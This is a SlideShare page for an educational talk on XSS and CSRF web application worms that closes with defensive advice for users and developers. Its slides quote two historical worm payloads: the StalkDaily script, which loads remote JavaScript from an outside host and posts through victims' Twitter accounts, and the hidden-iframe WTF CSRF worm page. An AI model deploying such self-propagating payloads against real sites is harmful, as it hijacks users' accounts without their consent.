SlideShare une entreprise Scribd logo

Web application worms

Télécharger en tant que PPTX, PDF
Mostafa Siraj
Mostafa Siraj

Web application vulnerabilities are dangerous. Hackers can target the web application directly (e.g. via SQL Injection) or can target the web application users (e.g. via XSS). In recent years a new type of attacks was developed in which an infected innocent user is infecting other users (AKA Web Application Worms). Such attacks usually has an exponential growth and a massive damage. This presentation we will discuss how to develop a web application worm and most importantly how to protect your website from web application worms.

1  sur  28
Web Application Worms By: Mostafa Siraj @mostafasiraj
Agenda • Computer Worms • Why Hackers Develop Web Application Worms • Web Application Worms • Introduction to XSS • StalkDaily Worm on Twitter - XSS Worm • Introduction to CSRF • WTF Worm on Twitter – CSRF Worm • Potential Business Impact • XSS & CSRF Defenses for • Users • Web Developers • Security Professionals • Questions @mostafasiraj
DISCLAIMER – Hacking websites is ILLEGAL – This presentation is meant for educational purposes ONLY – Only use this stuff on YOUR website and YOUR account @mostafasiraj
Computer Worm A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. (1) According to Wikipedia @mostafasiraj
Why Hackers Develop Web Application Worms • Easier to develop • Cross platform (Windows, Linux, OSX and Android) since execution occurs in web browser • Don’t rely on browser, application or OS vulnerabilities • Can propagate faster and cleaner than even the most notorious worms • 1.01 billion active users on FB (2) according to yahoo finance • 170 million active users on Twitter (3) according to techcrunch @mostafasiraj
Percentage likelihood that at least one serious vulnerability will appear in a website (4) According to whitehat security website statistics report, Summer 2012 @mostafasiraj
Web Application Worms An XSS worm is a malicious (or sometimes non-malicious) payload, usually written in JavaScript, that propagate among visitors of a website in the attempt Internet to progressively infect other visitors. (5) According to Wikipedia with modification You’ll see how to create a worm using a CSRF vulnerability only without XSS @mostafasiraj
How XSS Starts Adidas Website @mostafasiraj
Cross Site Scripting (Reflected) Vulnerable example.com?q=<script>……. Site Hacker Site Cookie @mostafasiraj
Cross Site Scripting (Stored XSS) Vulnerable Site Hacker Site Cookie @mostafasiraj
XSS Worms StalkDaily Worm on Twitter @mostafasiraj
StalkDaily Worm The bio field allowed Javascript <script src="hxxp://mikeyylolz.uuuq.com/x.js>“ /> @mostafasiraj
StalkDaily Script (6) source from dcortesi.com update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :)"); xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a '); var ajaxConn = new XHConn(); ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoke n+"&status="+update+"&tab=home&update=update"); ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+autht oken+"&user[url]="+xss+"&tab=home&update=update") @mostafasiraj
StalkDaily Infected Users @mostafasiraj
What About CSRF Worms @mostafasiraj
CSRF Example User has to be logged in https://www.MyBank.com/Transfer?from=user&to=hacker&amount=9999 MyBank.com Click Here to Win @mostafasiraj
CSRF Worms WTF Worm on Twitter @mostafasiraj
WTF Worm Updating Status on Twitter wasn’t protected from CSFR By visiting the hacker site, your twitter account will automatically write two tweets @mostafasiraj
WTF Worm Script (7) script source http://christianheilmann.com <html> <head></head> <body> <script> var el1 = document.createElement('iframe'); var el2 = document.createElement('iframe'); el1.style.visibility="hidden"; el2.style.visibility="hidden"; el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location; el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with% 20goats"; document.getElementsByTagName("body")[0].appendChild(el1); document.getElementsByTagName("body")[0].appendChild(el2); </script> </body> </html> @mostafasiraj
Discussion about WTF worm on Twitter @mostafasiraj
XSS and CSRF on Facebook Searches was done on Google @mostafasiraj
Potential Business Impact of Web Application Worms • The snowball effect (Samy versus Code Red) • Web browser botnets (DDoS) • Think about a worm targeting eBay or Amazon (purchases,reviews,..etc) • Stealing users’ credentials (MySpace worm on 2006) (10) According to computerworld.com • What could happen if AdSense or Facebook Connect was compromised with a web application worm • “High Roller” malware targeting cloud based banking (estimated losses 75M-2.5B) (11) According to redmondmag.com @mostafasiraj
@mostafasiraj XSS & CSRF Defenses
Defenses for Users • Exercise caution when clicking on links sent by email, instant message or through social networks • Use ScriptNo on Chrome and NoScript on Firefox ( Use IE at your own risk  ) • Avoid questionable websites and cracked softwares • Be alerted by security incidents @mostafasiraj
Defenses for Web Developers XSS – Input Validation -accept only known good- – Output Encoding (ESAPI) – Set the session cookie to be “HTTPOnly” – Specify the output encoding ( UTF-8, ASCII, …etc) – Do not use "blacklist" validation – Don’t encode/decode more than once  – (8) XSS Prevention Cheat Sheet on OWASP CSRF – Use CSRFGuard from OWASP – Do not use the GET method for any request that triggers a state change. – Identify especially dangerous operations and send a separate confirmation request to ensure that the user intended to perform that operation. – Ensure that there are no XSS vulnerabilities in your application – (9) CSRF Prevention Cheat Sheet on OWASP @mostafasiraj
Security Professionals • Remember “The natural way of writing code is insecure” • Developers must take application security training • Secure the whole SDLC • Assessments and Penetration Tests • White box and black box testing • Start considering WAF @mostafasiraj
Questions @mostafasiraj
References (1) Computer Worm on Wikipedia. http://en.wikipedia.org/wiki/Computer_worm (2) Active Users on Facebook. http://finance.yahoo.com/news/number-active-users-facebook-over-years-214600186--finance.html (3) Active Users on Twitter http://techcrunch.com/2012/07/31/twitter-may-have-500m-users-but-only-170m-are-active-75-on-twitters-own- clients/ (4) whitehat security website statistics report, https://www.whitehatsec.com/assets/WPstats_summer12_12th.pdf (5) XSS Worms on Wikipedia, http://en.wikipedia.org/wiki/XSS_worm (6) StalkDaily script, http://www.dcortesi.com/blog/2009/04/11/twitter-stalkdaily-worm-postmortem/ (7) WTF script, http://christianheilmann.com (8) XSS Prevention Cheat Sheet, https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet (9) CSRF Prevention Cheat Sheet, https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet (10) MySpace worm, http://www.computerworld.com/s/article/9005607/MySpace_worm_uses_QuickTime_for_exploit (11) High Roller malware, http://redmondmag.com/articles/2012/06/20/malware-targeting-banking.aspx @mostafasiraj

Recommandé

How develop a web application?
How develop a web application?How develop a web application?
How develop a web application?Md Ekram
 
Facebook Marketing Guide Line
Facebook Marketing Guide LineFacebook Marketing Guide Line
Facebook Marketing Guide LineMd Ekram
 
Personal internet security
Personal internet securityPersonal internet security
Personal internet securityMostafa Siraj
 
How did i steal your database CSCamp2011
How did i steal your database CSCamp2011How did i steal your database CSCamp2011
How did i steal your database CSCamp2011Mostafa Siraj
 
Online business
Online businessOnline business
Online businessMostafa Siraj
 
Color blindness
Color blindnessColor blindness
Color blindnessMostafa Siraj
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your databaseMostafa Siraj
 
2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by HubspotMarius Sescu
 

Recommandé

How develop a web application?
How develop a web application?How develop a web application?
How develop a web application?Md Ekram
 
Facebook Marketing Guide Line
Facebook Marketing Guide LineFacebook Marketing Guide Line
Facebook Marketing Guide LineMd Ekram
 
Personal internet security
Personal internet securityPersonal internet security
Personal internet securityMostafa Siraj
 
How did i steal your database CSCamp2011
How did i steal your database CSCamp2011How did i steal your database CSCamp2011
How did i steal your database CSCamp2011Mostafa Siraj
 
Online business
Online businessOnline business
Online businessMostafa Siraj
 
Color blindness
Color blindnessColor blindness
Color blindnessMostafa Siraj
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your databaseMostafa Siraj
 
2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by HubspotMarius Sescu
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTExpeed Software
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsPixeldarts
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthThinkNow
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfmarketingartwork
 
Skeleton Culture Code
Skeleton Culture CodeSkeleton Culture Code
Skeleton Culture CodeSkeleton Technologies
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024Neil Kimberley
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)contently
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024Albert Qian
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsKurio // The Social Media Age(ncy)
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Search Engine Journal
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summarySpeakerHub
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next Tessa Mero
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentLily Ray
 
How to have difficult conversations
How to have difficult conversations How to have difficult conversations
How to have difficult conversations Rajiv Jayarajah, MAppComm, ACC
 
Introduction to Data Science
Introduction to Data ScienceIntroduction to Data Science
Introduction to Data ScienceChristy Abraham Joy
 
Time Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesTime Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesVit Horky
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project managementMindGenius
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...RachelPearson36
 
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...Applitools
 

Contenu connexe

En vedette

Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTExpeed Software
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsPixeldarts
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthThinkNow
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfmarketingartwork
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024Neil Kimberley
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)contently
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024Albert Qian
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsKurio // The Social Media Age(ncy)
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Search Engine Journal
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summarySpeakerHub
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next Tessa Mero
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentLily Ray
 
Time Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesTime Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesVit Horky
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project managementMindGenius
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...RachelPearson36
 
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...Applitools
 

En vedette (20)

Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
 
Skeleton Culture Code
Skeleton Culture CodeSkeleton Culture Code
Skeleton Culture Code
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
 
How to have difficult conversations
How to have difficult conversations How to have difficult conversations
How to have difficult conversations
 
Introduction to Data Science
Introduction to Data ScienceIntroduction to Data Science
Introduction to Data Science
 
Time Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesTime Management & Productivity - Best Practices
Time Management & Productivity - Best Practices
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project management
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
 
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
 

Web application worms

  • 1. Web Application Worms By: Mostafa Siraj @mostafasiraj
  • 2. Agenda • Computer Worms • Why Hackers Develop Web Application Worms • Web Application Worms • Introduction to XSS • StalkDaily Worm on Twitter - XSS Worm • Introduction to CSRF • WTF Worm on Twitter – CSRF Worm • Potential Business Impact • XSS & CSRF Defenses for • Users • Web Developers • Security Professionals • Questions @mostafasiraj
  • 3. DISCLAIMER – Hacking websites is ILLEGAL – This presentation is meant for educational purposes ONLY – Only use this stuff on YOUR website and YOUR account @mostafasiraj
  • 4. Computer Worm A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. (1) According to Wikipedia @mostafasiraj
  • 5. Why Hackers Develop Web Application Worms • Easier to develop • Cross platform (Windows, Linux, OSX and Android) since execution occurs in web browser • Don’t rely on browser, application or OS vulnerabilities • Can propagate faster and cleaner than even the most notorious worms • 1.01 billion active users on FB (2) according to yahoo finance • 170 million active users on Twitter (3) according to techcrunch @mostafasiraj
  • 6. Percentage likelihood that at least one serious vulnerability will appear in a website (4) According to whitehat security website statistics report, Summer 2012 @mostafasiraj
  • 7. Web Application Worms An XSS worm is a malicious (or sometimes non-malicious) payload, usually written in JavaScript, that propagate among visitors of a website in the attempt Internet to progressively infect other visitors. (5) According to Wikipedia with modification You’ll see how to create a worm using a CSRF vulnerability only without XSS @mostafasiraj
  • 8. How XSS Starts Adidas Website @mostafasiraj
  • 9. Cross Site Scripting (Reflected) Vulnerable example.com?q=<script>……. Site Hacker Site Cookie @mostafasiraj
  • 10. Cross Site Scripting (Stored XSS) Vulnerable Site Hacker Site Cookie @mostafasiraj
  • 11. XSS Worms StalkDaily Worm on Twitter @mostafasiraj
  • 12. StalkDaily Worm The bio field allowed Javascript <script src="hxxp://mikeyylolz.uuuq.com/x.js>“ /> @mostafasiraj
  • 13. StalkDaily Script (6) source from dcortesi.com update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :)"); xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a '); var ajaxConn = new XHConn(); ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoke n+"&status="+update+"&tab=home&update=update"); ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+autht oken+"&user[url]="+xss+"&tab=home&update=update") @mostafasiraj
  • 15. What About CSRF Worms @mostafasiraj
  • 16. CSRF Example User has to be logged in https://www.MyBank.com/Transfer?from=user&to=hacker&amount=9999 MyBank.com Click Here to Win @mostafasiraj
  • 17. CSRF Worms WTF Worm on Twitter @mostafasiraj
  • 18. WTF Worm Updating Status on Twitter wasn’t protected from CSFR By visiting the hacker site, your twitter account will automatically write two tweets @mostafasiraj
  • 19. WTF Worm Script (7) script source http://christianheilmann.com <html> <head></head> <body> <script> var el1 = document.createElement('iframe'); var el2 = document.createElement('iframe'); el1.style.visibility="hidden"; el2.style.visibility="hidden"; el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location; el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with% 20goats"; document.getElementsByTagName("body")[0].appendChild(el1); document.getElementsByTagName("body")[0].appendChild(el2); </script> </body> </html> @mostafasiraj
  • 20. Discussion about WTF worm on Twitter @mostafasiraj
  • 21. XSS and CSRF on Facebook Searches was done on Google @mostafasiraj
  • 22. Potential Business Impact of Web Application Worms • The snowball effect (Samy versus Code Red) • Web browser botnets (DDoS) • Think about a worm targeting eBay or Amazon (purchases,reviews,..etc) • Stealing users’ credentials (MySpace worm on 2006) (10) According to computerworld.com • What could happen if AdSense or Facebook Connect was compromised with a web application worm • “High Roller” malware targeting cloud based banking (estimated losses 75M-2.5B) (11) According to redmondmag.com @mostafasiraj
  • 23. @mostafasiraj XSS & CSRF Defenses
  • 24. Defenses for Users • Exercise caution when clicking on links sent by email, instant message or through social networks • Use ScriptNo on Chrome and NoScript on Firefox ( Use IE at your own risk  ) • Avoid questionable websites and cracked softwares • Be alerted by security incidents @mostafasiraj
  • 25. Defenses for Web Developers XSS – Input Validation -accept only known good- – Output Encoding (ESAPI) – Set the session cookie to be “HTTPOnly” – Specify the output encoding ( UTF-8, ASCII, …etc) – Do not use "blacklist" validation – Don’t encode/decode more than once  – (8) XSS Prevention Cheat Sheet on OWASP CSRF – Use CSRFGuard from OWASP – Do not use the GET method for any request that triggers a state change. – Identify especially dangerous operations and send a separate confirmation request to ensure that the user intended to perform that operation. – Ensure that there are no XSS vulnerabilities in your application – (9) CSRF Prevention Cheat Sheet on OWASP @mostafasiraj
  • 26. Security Professionals • Remember “The natural way of writing code is insecure” • Developers must take application security training • Secure the whole SDLC • Assessments and Penetration Tests • White box and black box testing • Start considering WAF @mostafasiraj
  • 28. References (1) Computer Worm on Wikipedia. http://en.wikipedia.org/wiki/Computer_worm (2) Active Users on Facebook. http://finance.yahoo.com/news/number-active-users-facebook-over-years-214600186--finance.html (3) Active Users on Twitter http://techcrunch.com/2012/07/31/twitter-may-have-500m-users-but-only-170m-are-active-75-on-twitters-own- clients/ (4) whitehat security website statistics report, https://www.whitehatsec.com/assets/WPstats_summer12_12th.pdf (5) XSS Worms on Wikipedia, http://en.wikipedia.org/wiki/XSS_worm (6) StalkDaily script, http://www.dcortesi.com/blog/2009/04/11/twitter-stalkdaily-worm-postmortem/ (7) WTF script, http://christianheilmann.com (8) XSS Prevention Cheat Sheet, https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet (9) CSRF Prevention Cheat Sheet, https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet (10) MySpace worm, http://www.computerworld.com/s/article/9005607/MySpace_worm_uses_QuickTime_for_exploit (11) High Roller malware, http://redmondmag.com/articles/2012/06/20/malware-targeting-banking.aspx @mostafasiraj

Notes de l'éditeur

  1. Gandalf vsbalrog